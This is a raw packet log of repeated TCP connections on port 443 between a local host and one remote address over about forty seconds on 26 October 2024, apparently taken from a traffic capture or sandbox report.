Oct 26, 2024 13:46:29.691948891 CEST	50176	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:29.691961050 CEST	443	50176	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:30.956899881 CEST	443	50176	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:30.956980944 CEST	50176	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:30.957055092 CEST	50176	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:30.957066059 CEST	443	50176	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:30.957674026 CEST	50177	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:30.957696915 CEST	443	50177	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:30.957765102 CEST	50177	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:30.957823992 CEST	50177	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:30.957854986 CEST	443	50177	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:30.957892895 CEST	50177	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:31.070713997 CEST	50178	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:31.070754051 CEST	443	50178	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:31.070868015 CEST	50178	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:31.071249962 CEST	50178	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:31.071259022 CEST	443	50178	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:32.386174917 CEST	443	50178	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:32.386337042 CEST	50178	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:32.386537075 CEST	50178	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:32.386553049 CEST	443	50178	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:32.387208939 CEST	50179	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:32.387249947 CEST	443	50179	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:32.387326956 CEST	50179	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:32.387593031 CEST	50179	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:32.387604952 CEST	443	50179	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:33.666804075 CEST	443	50179	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:33.666872978 CEST	50179	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.667002916 CEST	50179	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.667016029 CEST	443	50179	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:33.667628050 CEST	50180	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.667676926 CEST	443	50180	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:33.667893887 CEST	50180	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.667990923 CEST	50180	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.668011904 CEST	443	50180	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:33.668054104 CEST	50180	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.773865938 CEST	50181	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.773907900 CEST	443	50181	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:33.774036884 CEST	50181	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.774311066 CEST	50181	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:33.774327993 CEST	443	50181	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:35.045109987 CEST	443	50181	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:35.045258999 CEST	50181	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:35.045334101 CEST	50181	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:35.045355082 CEST	443	50181	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:35.046027899 CEST	50182	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:35.046092987 CEST	443	50182	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:35.046355009 CEST	50182	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:35.046581984 CEST	50182	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:35.046591997 CEST	443	50182	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:36.442436934 CEST	443	50182	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:36.442509890 CEST	50182	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.442606926 CEST	50182	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.442625999 CEST	443	50182	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:36.443191051 CEST	50183	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.443295956 CEST	443	50183	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:36.443392038 CEST	50183	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.443448067 CEST	50183	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.443516016 CEST	443	50183	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:36.443588972 CEST	50183	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.556951046 CEST	50184	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.557002068 CEST	443	50184	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:36.557084084 CEST	50184	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.557322979 CEST	50184	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:36.557332993 CEST	443	50184	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:37.860970020 CEST	443	50184	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:37.861128092 CEST	50184	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:37.861192942 CEST	50184	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:37.861216068 CEST	443	50184	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:37.861814022 CEST	50185	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:37.861860991 CEST	443	50185	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:37.861944914 CEST	50185	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:37.862144947 CEST	50185	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:37.862153053 CEST	443	50185	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:39.167911053 CEST	443	50185	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:39.168060064 CEST	50185	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.168672085 CEST	50186	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.168677092 CEST	50185	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.168695927 CEST	443	50185	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:39.168711901 CEST	443	50186	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:39.168808937 CEST	50186	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.168847084 CEST	50186	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.168917894 CEST	443	50186	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:39.168965101 CEST	50186	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.274451971 CEST	50187	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.274508953 CEST	443	50187	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:39.274647951 CEST	50187	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.275027990 CEST	50187	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:39.275038958 CEST	443	50187	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:40.558258057 CEST	443	50187	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:40.558417082 CEST	50187	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:40.558554888 CEST	50187	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:40.558573008 CEST	443	50187	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:40.559289932 CEST	50188	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:40.559348106 CEST	443	50188	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:40.559432983 CEST	50188	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:40.559767008 CEST	50188	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:40.559787989 CEST	443	50188	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:41.848393917 CEST	443	50188	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:41.848593950 CEST	50188	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.848679066 CEST	50188	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.848706961 CEST	443	50188	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:41.849309921 CEST	50189	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.849373102 CEST	443	50189	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:41.849448919 CEST	50189	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.849493027 CEST	50189	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.849577904 CEST	443	50189	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:41.849630117 CEST	50189	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.962040901 CEST	50190	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.962097883 CEST	443	50190	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:41.962274075 CEST	50190	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.962976933 CEST	50190	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:41.962997913 CEST	443	50190	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:43.273029089 CEST	443	50190	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:43.273236990 CEST	50190	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:43.273449898 CEST	50190	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:43.273471117 CEST	443	50190	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:43.274070978 CEST	50191	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:43.274112940 CEST	443	50191	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:43.274199009 CEST	50191	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:43.274471998 CEST	50191	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:43.274486065 CEST	443	50191	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:44.581226110 CEST	443	50191	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:44.581348896 CEST	50191	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.581491947 CEST	50191	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.581510067 CEST	443	50191	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:44.582699060 CEST	50192	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.582741022 CEST	443	50192	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:44.582881927 CEST	50192	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.582906961 CEST	50192	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.582973957 CEST	443	50192	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:44.583019018 CEST	50192	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.697428942 CEST	50193	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.697487116 CEST	443	50193	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:44.697573900 CEST	50193	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.697827101 CEST	50193	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:44.697843075 CEST	443	50193	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:46.014751911 CEST	443	50193	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:46.014853954 CEST	50193	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:46.015062094 CEST	50193	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:46.015079021 CEST	443	50193	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:46.015506029 CEST	50194	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:46.015547037 CEST	443	50194	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:46.015616894 CEST	50194	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:46.015820980 CEST	50194	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:46.015830994 CEST	443	50194	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:47.311500072 CEST	443	50194	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:47.311796904 CEST	50194	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.313122034 CEST	50194	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.313149929 CEST	443	50194	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:47.313757896 CEST	50195	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.313785076 CEST	443	50195	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:47.314003944 CEST	50195	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.314096928 CEST	50195	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.314167023 CEST	443	50195	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:47.314224005 CEST	50195	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.434292078 CEST	50196	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.434335947 CEST	443	50196	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:47.434411049 CEST	50196	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.434684992 CEST	50196	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:47.434700012 CEST	443	50196	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:48.736656904 CEST	443	50196	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:48.736785889 CEST	50196	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:48.736852884 CEST	50196	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:48.736871004 CEST	443	50196	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:48.737549067 CEST	50197	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:48.737596989 CEST	443	50197	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:48.737679958 CEST	50197	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:48.738306046 CEST	50197	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:48.738327026 CEST	443	50197	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:50.055865049 CEST	443	50197	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:50.055965900 CEST	50197	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.056036949 CEST	50197	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.056065083 CEST	443	50197	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:50.056633949 CEST	50198	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.056684017 CEST	443	50198	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:50.056751013 CEST	50198	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.056783915 CEST	50198	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.056869030 CEST	443	50198	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:50.056909084 CEST	50198	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.230551958 CEST	50199	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.230598927 CEST	443	50199	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:50.230722904 CEST	50199	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.231031895 CEST	50199	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:50.231046915 CEST	443	50199	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:51.533508062 CEST	443	50199	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:51.533636093 CEST	50199	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:51.533724070 CEST	50199	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:51.533759117 CEST	443	50199	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:51.537866116 CEST	50200	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:51.537920952 CEST	443	50200	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:51.538012028 CEST	50200	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:51.538389921 CEST	50200	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:51.538408995 CEST	443	50200	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:52.859844923 CEST	443	50200	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:52.859949112 CEST	50200	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.860014915 CEST	50200	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.860037088 CEST	443	50200	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:52.860595942 CEST	50201	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.860642910 CEST	443	50201	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:52.860716105 CEST	50201	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.860775948 CEST	50201	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.860861063 CEST	443	50201	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:52.860913992 CEST	50201	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.978308916 CEST	50202	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.978353977 CEST	443	50202	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:52.978501081 CEST	50202	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.978729010 CEST	50202	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:52.978740931 CEST	443	50202	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:54.273380995 CEST	443	50202	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:54.273510933 CEST	50202	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:54.284056902 CEST	50202	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:54.284087896 CEST	443	50202	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:54.284693956 CEST	50203	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:54.284735918 CEST	443	50203	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:54.284802914 CEST	50203	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:54.285002947 CEST	50203	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:54.285013914 CEST	443	50203	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:55.585619926 CEST	443	50203	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:55.585690975 CEST	50203	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.585867882 CEST	50203	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.585886955 CEST	443	50203	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:55.586487055 CEST	50204	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.586558104 CEST	443	50204	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:55.586641073 CEST	50204	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.586703062 CEST	50204	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.586792946 CEST	443	50204	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:55.586848021 CEST	50204	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.695626974 CEST	50205	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.695698977 CEST	443	50205	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:55.695792913 CEST	50205	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.696074009 CEST	50205	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:55.696088076 CEST	443	50205	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:57.003602028 CEST	443	50205	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:57.003777981 CEST	50205	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:57.003830910 CEST	50205	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:57.003855944 CEST	443	50205	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:57.004530907 CEST	50206	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:57.004573107 CEST	443	50206	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:57.004652977 CEST	50206	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:57.004956961 CEST	50206	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:57.004967928 CEST	443	50206	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:58.331634045 CEST	443	50206	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:58.331914902 CEST	50206	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.331914902 CEST	50206	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.332456112 CEST	50207	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.332518101 CEST	443	50207	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:58.332597017 CEST	50207	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.332643986 CEST	50207	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.332681894 CEST	443	50207	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:58.332736015 CEST	50207	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.445705891 CEST	50208	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.445755959 CEST	443	50208	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:58.445827007 CEST	50208	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.446089983 CEST	50208	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.446101904 CEST	443	50208	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:58.632586002 CEST	50206	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:58.632612944 CEST	443	50206	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:59.747910023 CEST	443	50208	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:59.748162031 CEST	50208	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:59.748437881 CEST	50208	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:59.748459101 CEST	443	50208	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:59.749957085 CEST	50209	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:59.750003099 CEST	443	50209	20.25.126.96	192.168.2.6
Oct 26, 2024 13:46:59.750144958 CEST	50209	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:59.750663042 CEST	50209	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:46:59.750674963 CEST	443	50209	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.021807909 CEST	443	50209	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.022039890 CEST	50209	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.022592068 CEST	50209	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.022595882 CEST	50210	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.022612095 CEST	443	50209	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.022646904 CEST	443	50210	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.022716045 CEST	50210	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.022780895 CEST	50210	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.023329973 CEST	443	50210	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.023442030 CEST	443	50210	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.023483038 CEST	50210	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.135482073 CEST	50211	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.135543108 CEST	443	50211	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:01.135672092 CEST	50211	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.135900021 CEST	50211	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:01.135909081 CEST	443	50211	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:02.448863029 CEST	443	50211	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:02.448935986 CEST	50211	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:02.449007988 CEST	50211	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:02.449019909 CEST	443	50211	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:02.449594975 CEST	50212	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:02.449630022 CEST	443	50212	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:02.449702024 CEST	50212	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:02.449959040 CEST	50212	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:02.449970961 CEST	443	50212	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:03.748622894 CEST	443	50212	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:03.748788118 CEST	50212	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.748858929 CEST	50212	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.748881102 CEST	443	50212	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:03.749610901 CEST	50213	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.749655962 CEST	443	50213	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:03.749732018 CEST	50213	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.749840975 CEST	50213	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.749871016 CEST	443	50213	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:03.749921083 CEST	50213	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.851938009 CEST	50214	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.851986885 CEST	443	50214	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:03.852067947 CEST	50214	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.852385044 CEST	50214	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:03.852396965 CEST	443	50214	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:05.147918940 CEST	443	50214	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:05.148130894 CEST	50214	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:05.148207903 CEST	50214	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:05.148225069 CEST	443	50214	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:05.148906946 CEST	50215	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:05.148952007 CEST	443	50215	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:05.149039984 CEST	50215	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:05.149241924 CEST	50215	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:05.149257898 CEST	443	50215	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:06.442137957 CEST	443	50215	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:06.442323923 CEST	50215	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.442374945 CEST	50215	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.442395926 CEST	443	50215	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:06.443115950 CEST	50217	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.443150043 CEST	443	50217	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:06.443289042 CEST	50217	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.443332911 CEST	50217	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.443372965 CEST	443	50217	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:06.443448067 CEST	50217	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.555140972 CEST	50218	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.555186033 CEST	443	50218	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:06.555253983 CEST	50218	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.555480003 CEST	50218	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:06.555490971 CEST	443	50218	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:07.832858086 CEST	443	50218	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:07.832941055 CEST	50218	443	192.168.2.6	20.25.126.96
